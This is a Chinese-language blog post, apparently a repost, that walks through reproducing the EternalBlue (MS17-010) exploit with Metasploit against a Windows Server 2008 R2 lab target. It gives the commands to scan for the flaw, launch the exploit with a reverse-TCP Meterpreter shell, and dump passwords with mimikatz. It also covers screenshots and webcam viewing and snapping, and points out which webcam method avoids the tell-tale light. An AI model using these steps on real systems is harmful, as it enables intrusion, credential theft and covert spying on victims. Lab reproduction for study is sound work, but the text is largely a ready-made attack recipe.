close

永恆之藍復現(CVE-2017-0146)

作者:煩惱隨風飄 時間: 2021-06-26 09:06:19
【摘要】 文章目錄 測試環境操作步驟在Meterpreter上的一些別的操作 測試環境 靶機 Server 2008 R2 攻擊機kali 操作步驟 1、啟動msf msfconsole ...

測試環境

靶機 Server 2008 R2
攻擊機kali

操作步驟

1、啟動msf

msfconsole

永恆之藍復現(CVE-2017-0146)1
2、搜索 ms17-010 模塊

search ms17-010

永恆之藍復現(CVE-2017-0146)2
1、利用模塊1來檢測是否有此漏洞

use auxiliary/scanner/smb/smb_ms17_010 
set rhost 受害者IP
run

永恆之藍復現(CVE-2017-0146)3

2、利用模塊2來進行攻擊
查看需要配置的信息

use exploit/windows/smb/ms17_010_eternalblue 
show options

永恆之藍復現(CVE-2017-0146)4
設置受害者的IP:

set rhost 受害者IP

設置監聽者IP

set lhost 監聽者KaliIP

設置payload

set payload windows/x64/meterpreter/reverse_tcp

啟動 run 或exploit

run

拿shell
永恆之藍復現(CVE-2017-0146)5
解決亂碼情況

chcp 65001

永恆之藍復現(CVE-2017-0146)6

在Meterpreter上的一些別的操作

1、截屏

screenshot

永恆之藍復現(CVE-2017-0146)7
2、獲取系統密碼
加載mimikatz模塊

load mimikatz

永恆之藍復現(CVE-2017-0146)8
獲取用戶密碼

wdigest

永恆之藍復現(CVE-2017-0146)9
3、開啟攝像頭
檢測有沒有攝像頭

webcam_list

永恆之藍復現(CVE-2017-0146)10
打開攝像頭

webcam_stream

打開攝像頭,燈會一直亮著,容易被發現
永恆之藍復現(CVE-2017-0146)11
Ctrl + C 退出,(關閉攝像頭)
永恆之藍復現(CVE-2017-0146)12
拍照

webcam_snap

拍照,攝像頭的燈只是一閃而過。沒那麼容易發現
永恆之藍復現(CVE-2017-0146)13

全站熱搜
創作者介紹
創作者 好康搬運工 的頭像
好康搬運工

好康搬運工

好康搬運工 發表在 痞客邦 留言(0) 人氣()